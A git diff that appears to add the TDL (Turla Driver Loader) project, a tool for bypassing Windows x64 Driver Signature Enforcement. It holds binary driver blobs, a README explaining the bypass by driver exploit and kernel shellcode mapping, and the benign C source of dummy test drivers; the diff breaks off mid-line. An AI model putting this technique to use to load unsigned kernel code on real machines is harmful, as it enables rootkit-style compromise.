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 CSZc!n literal 0 HcmV?d00001 diff --git a/Compiled/dummy.sys b/Compiled/dummy.sys new file mode 100644 index 0000000000000000000000000000000000000000..8a043a68e950b437ff81359a94758e93817e7abe GIT binary patch literal 2560 zcmeHJ&1(}u6n{zD;8$uSZjHryH zFBgbzC^Qj??3?gIug#x%_vpx#_8%>_ALBarYq8x%e8HC53ohC&&ZwoT;O>-JJ_DdU z2*KTR&#!hkn{X8N2M+)Q(IN^Jl0+SKXQ_YyF-LzGyU|h4izDv2b`~H2H<9XX>cIB( zmc`u;CjjE!%o_;+X7cZXX(W3@NpMBBWPnqGpprcJoa!9!Y6~hUcC-= zfc?+`Jjq+A$Rx`Aw7}0qgEUz zy8azK(KQ?;`&+quaO}RDO0I>BsjpKXo#>Lwcq16Cs3iilBDWE8_S>BO$%#Hi&-$0o ze~Uyl%^+oN=wyy^Mm6__FiFg&X;GbUnN=t;Ety*cuNJY|Bq`wyg6MLsMinAkXoBvD zX|B#wo?#Ymy7ufb-DR1RB+rc!HBEAw#I!nz$7;us5%2oHy%+NxzJuNVC!Y*W>jk%l z8Bsz(Q~GQrMjgWtXSn#Rsb5otZ{)_=j)tPX8EbYv*EnC&6-u92ofoW literal 0 HcmV?d00001 diff --git a/Compiled/dummy2.sys b/Compiled/dummy2.sys new file mode 100644 index 0000000000000000000000000000000000000000..959260ac79fe10d23e48cf7e1fed10ceb20622e6 GIT binary patch literal 4096 zcmeHKZ){Ul6hG^_Irg`P)y)Cnfp2jHGm9gEFNDs%np^2u?Yf~b?MnAXU+CJ}zWo6c zkPM9V+5_apY1UI$6X>p;y|^xGJoch2&67P-24A*(D6d`{mY}no2Pj`kUbypKWUx8ZU@Cz8!7vg-^%F zfgi@Ujc+yaeG~mkIKsL4nfcsA{V!SR_|n}ydD~^0OI4O?q6%2}!gz5)Y+NB{39q?s zAu7k}^TN&KgTSZZJW&btftq#7!(ZEz7SsK*lc>eia+QOK6}RtJ7l;;5;oGXpqbmBR zm!aZQE{EjT4wV;yDAJnj52+!d%{c?#1FGbWLUCfst%)qpoIBQF^01}F#R;BgxhKGF zU-M0c!Q|Bfi;6&Wwy1ee{TJ;3OZSQuEFBeXEUk)-E7;g22h*-Iz2V?zruH$vAJ~>Fb(?jrXu(Fd<$HD3rVWkOnR7Ya3%Xhl_mfZz`+j)st09`WD8m*v zZM$F_+hDT|o!4B|lD5n$X{BjNY|&g52v7wMsQmyK1;f4`^h{~ym0gr^Szonxm1JBM z-EZ9hRL`9Mu0{J{KmXh>mhC%-VYH)dC(=O&OLs12+A+gE%bayoWK2^D<--vjJqLApAn}N2(u-U0S^t60(dxV zw&tfy=SQ>7ZF%QKhW$7Wn(5tFnck5x>|dBI_lR3xK9}Jr9bVm?F?Z+?4!b0S!^I7Y zm2U$PeLrLBwU~2Vi#sz=w~@DNTG5uY!`d~&o&sx&QTOs;zEr)t0fU?}>~eO|`qmq(Jgw$|^vY+8(-JB9UeqXTT z$)M!!@wnVUSLgD8ztfxNpuI!4r4IV`?%Ubs@Rm#&;#@#Dmt7fW7WH?n8(bZa zDq*h@TU*S+f&70;q&>UV4LN*0hdXn)H;29)=6A+YUrCk+sJy1&%n^4)<2Am_dZKyr4P zF9AuEl05lKA{*w}UlP4Zp8h4#XXbxN444l9`L9<@5kvSh|-#-7;p|&c5Pi z)AA-PULB7CjJE&-)wSRmfE;aFYL>#n)BS0~z8OS3*TxR^-TMB@<^wm<%{ueqpX&ZM zQ%CX5j{Co{=pH-7bpdjRa<}*5fpWhZ<>{(Bri76WyVRr-TZ7+MsV6?*iVr5DvMT%K z=ZEAJ{;n}gK3NqfBci2~_Uw9zmJ}>zS|h^#uU_Lrbi|3N@zmO6EZQoM%6C}I6sA7` D^jrH4 literal 0 HcmV?d00001 diff --git a/README.md b/README.md new file mode 100644 index 0000000..db1b469 --- /dev/null +++ b/README.md @@ -0,0 +1,40 @@ + +# TDL (Turla Driver Loader) +## Driver loader for bypassing Windows x64 Driver Signature Enforcement + +For more info see ++ Defeating x64 Driver Signature Enforcement http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3322 ++ WinNT/Turla http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193 + +# System Requirements and limitations + ++ x64 Windows 7/8/8.1/10. ++ TDL designed only for x64 Windows, Vista not listed as supported because it is obsolete. ++ Administrative privilege is required. ++ Loaded drivers MUST BE specially designed to run as "driverless". ++ No SEH support for target drivers. ++ No driver unloading. ++ Only ntoskrnl import resolved, everything else is up to you. ++ Dummy driver examples provided. + +You use it at your own risk. Some lazy AV may flag this loader as malware. + +# Differences between DSEFix and TDL +While both DSEFix and TDL uses advantage of driver exploit they completely different on way of it use. ++ DSEFix manipulate kernel variable called g_CiEnabled (Vista/7, ntoskrnl.exe) and/or g_CiOptions (8+. CI.DLL). Main advantage of DSEFix is it simplicity - you turn DSE off - load your driver (or patched one) and nothing else required. Main disadvantage of DSEFix is that on the modern version of Windows (8+) g_CiOptions variable is subject of PatchGuard (KPP) protection, which mean DSEFix is a potential BSOD-generator. ++ TDL does not patch any kernel variables, which makes it friendly to PatchGuard. It uses small shellcode which maps your driver to kernel mode without involving Windows loader (and as result without triggering any parts of DSE) and executes it. This is main advantage of TDL - non invasive bypass of DSE. There are many disadvantages however - the first and main -> your driver MUST BE specially created to run as "driverless" which mean you will be unable to load *any* driver but only specially designed. Your driver will exist in kernel mode as executable code buffer, it won't be linked to PsLoadedModuleList, there will be other limitations. However this code will work at kernel mode and user mode application will be able communicate with it. You can load multiple drivers, of course if they are not conflict with each other. + +# Build + +TDL comes with full source code. +In order to build from source you need Microsoft Visual Studio 2015 U1 and later versions. For driver builds you need Microsoft Windows Driver Kit 8.1 and/or above. + + +# Authors + +(c) 2016 TDL Project + +# Credits + ++ R136a1 ++ N. Rin diff --git a/Source/DummyDrv/dummy.sln b/Source/DummyDrv/dummy.sln new file mode 100644 index 0000000..28627ee --- /dev/null +++ b/Source/DummyDrv/dummy.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 14 +VisualStudioVersion = 14.0.24720.0 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.ActiveCfg = Release|x64 + {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Build.0 = Release|x64 + {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Deploy.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/Source/DummyDrv/dummy/dummy.vcxproj b/Source/DummyDrv/dummy/dummy.vcxproj new file mode 100644 index 0000000..da49f9f --- /dev/null +++ b/Source/DummyDrv/dummy/dummy.vcxproj @@ -0,0 +1,239 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + Debug + ARM + + + Release + ARM + + + Debug + ARM64 + + + Release + ARM64 + + + + {3D8146DE-8064-46C0-9E70-CEEC357B2290} + {1bc93793-694f-48fe-9372-81e2b05556fd} + v4.5 + 12.0 + Debug + Win32 + dummy + 8.1 + + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver8.1 + Driver + KMDF + Universal + true + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + + + + + + + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + true + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + + false + true + Speed + false + true + All + true + CompileAsC + true + false + + + false + false + true + true + true + DriverEntry + true + true + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + + + + + + + + \ No newline at end of file diff --git a/Source/DummyDrv/dummy/dummy.vcxproj.filters b/Source/DummyDrv/dummy/dummy.vcxproj.filters new file mode 100644 index 0000000..267d15c --- /dev/null +++ b/Source/DummyDrv/dummy/dummy.vcxproj.filters @@ -0,0 +1,26 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + {8E41214B-6785-4CFE-B992-037D68949A14} + inf;inv;inx;mof;mc; + + + + + Source Files + + + \ No newline at end of file diff --git a/Source/DummyDrv/dummy/dummy.vcxproj.user b/Source/DummyDrv/dummy/dummy.vcxproj.user new file mode 100644 index 0000000..5979185 --- /dev/null +++ b/Source/DummyDrv/dummy/dummy.vcxproj.user @@ -0,0 +1,6 @@ + + + + Off + + \ No newline at end of file diff --git a/Source/DummyDrv/dummy/main.c b/Source/DummyDrv/dummy/main.c new file mode 100644 index 0000000..dade601 --- /dev/null +++ b/Source/DummyDrv/dummy/main.c @@ -0,0 +1,63 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 +* +* TITLE: MAIN.C +* +* VERSION: 1.00 +* +* DATE: 29 Jan 2016 +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#include + +DRIVER_INITIALIZE DriverEntry; +#pragma alloc_text(INIT, DriverEntry) + +/* +* DriverEntry +* +* Purpose: +* +* Driver base entry point. +* +*/ +NTSTATUS DriverEntry( + _In_ struct _DRIVER_OBJECT *DriverObject, + _In_ PUNICODE_STRING RegistryPath + ) +{ + LARGE_INTEGER tm; + PEPROCESS Process; + + tm.QuadPart = -10000000; + + /* This parameters are invalid due to nonstandard way of loading and should not be used. */ + UNREFERENCED_PARAMETER(DriverObject); + UNREFERENCED_PARAMETER(RegistryPath); + + DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry); + + Process = PsGetCurrentProcess(); + + do { + + KeDelayExecutionThread(KernelMode, FALSE, &tm); + + DbgPrint("I'm at %s, Process : %lu (%p)", + __FUNCTION__, + (ULONG)PsGetCurrentProcessId(), + Process + ); + + + } while (1); + + return STATUS_SUCCESS; +} diff --git a/Source/DummyDrv2/dummy.sln b/Source/DummyDrv2/dummy.sln new file mode 100644 index 0000000..28627ee --- /dev/null +++ b/Source/DummyDrv2/dummy.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 14 +VisualStudioVersion = 14.0.24720.0 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.ActiveCfg = Release|x64 + {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Build.0 = Release|x64 + {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Deploy.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/Source/DummyDrv2/dummy/dummy.vcxproj b/Source/DummyDrv2/dummy/dummy.vcxproj new file mode 100644 index 0000000..8fa877b --- /dev/null +++ b/Source/DummyDrv2/dummy/dummy.vcxproj @@ -0,0 +1,242 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + Debug + ARM + + + Release + ARM + + + Debug + ARM64 + + + Release + ARM64 + + + + {3D8146DE-8064-46C0-9E70-CEEC357B2290} + {1bc93793-694f-48fe-9372-81e2b05556fd} + v4.5 + 12.0 + Debug + Win32 + dummy + 8.1 + + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver8.1 + Driver + KMDF + Universal + true + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windowsv6.3 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + + + + + + + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + false + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + DbgengKernelDebugger + AllRules.ruleset + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + + + + false + true + Speed + false + true + All + true + CompileAsC + false + false + + + false + false + true + true + true + DriverEntry + true + true + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + false + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Source/DummyDrv2/dummy/dummy.vcxproj.filters b/Source/DummyDrv2/dummy/dummy.vcxproj.filters new file mode 100644 index 0000000..8c93f38 --- /dev/null +++ b/Source/DummyDrv2/dummy/dummy.vcxproj.filters @@ -0,0 +1,31 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + {8E41214B-6785-4CFE-B992-037D68949A14} + inf;inv;inx;mof;mc; + + + + + Source Files + + + + + Header Files + + + \ No newline at end of file diff --git a/Source/DummyDrv2/dummy/dummy.vcxproj.user b/Source/DummyDrv2/dummy/dummy.vcxproj.user new file mode 100644 index 0000000..5979185 --- /dev/null +++ b/Source/DummyDrv2/dummy/dummy.vcxproj.user @@ -0,0 +1,6 @@ + + + + Off + + \ No newline at end of file diff --git a/Source/DummyDrv2/dummy/main.c b/Source/DummyDrv2/dummy/main.c new file mode 100644 index 0000000..7b434d3 --- /dev/null +++ b/Source/DummyDrv2/dummy/main.c @@ -0,0 +1,296 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 +* +* TITLE: MAIN.C +* +* VERSION: 1.00 +* +* DATE: 29 Jan 2016 +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#include +#include "main.h" + +#define DEBUGPRINT + +/* +* DevioctlDispatch +* +* Purpose: +* +* IRP_MJ_DEVICE_CONTROL dispatch. +* +*/ +NTSTATUS DevioctlDispatch( + _In_ struct _DEVICE_OBJECT *DeviceObject, + _Inout_ struct _IRP *Irp + ) +{ + NTSTATUS status = STATUS_SUCCESS; + ULONG bytesIO = 0; + PIO_STACK_LOCATION stack; + BOOLEAN condition = FALSE; + PINOUTPARAM rp, wp; + + UNREFERENCED_PARAMETER(DeviceObject); + +#ifdef DEBUGPRINT + DbgPrint("%s IRP_MJ_DEVICE_CONTROL", __FUNCTION__); +#endif + + stack = IoGetCurrentIrpStackLocation(Irp); + + do { + + if (stack == NULL) { + status = STATUS_INTERNAL_ERROR; + break; + } + + rp = (PINOUTPARAM)Irp->AssociatedIrp.SystemBuffer; + wp = (PINOUTPARAM)Irp->AssociatedIrp.SystemBuffer; + if (rp == NULL) { + status = STATUS_INVALID_PARAMETER; + break; + } + + switch (stack->Parameters.DeviceIoControl.IoControlCode) { + case DUMMYDRV_REQUEST1: + +#ifdef DEBUGPRINT + DbgPrint("%s DUMMYDRV_REQUEST1 hit", __FUNCTION__); +#endif + if (stack->Parameters.DeviceIoControl.InputBufferLength != sizeof(INOUT_PARAM)) { + status = STATUS_INVALID_PARAMETER; + break; + } + +#ifdef DEBUGPRINT + DbgPrint("%s in params = %lx, %lx, %lx, %lx", __FUNCTION__, + rp->Param1, rp->Param2, rp->Param3, rp->Param4); +#endif + + wp->Param1 = 11111111; + wp->Param2 = 22222222; + wp->Param3 = 33333333; + wp->Param4 = 44444444; + + status = STATUS_SUCCESS; + bytesIO = sizeof(INOUT_PARAM); + + break; + + default: + +#ifdef DEBUGPRINT + DbgPrint("%s hit with invalid IoControlCode", __FUNCTION__); +#endif + status = 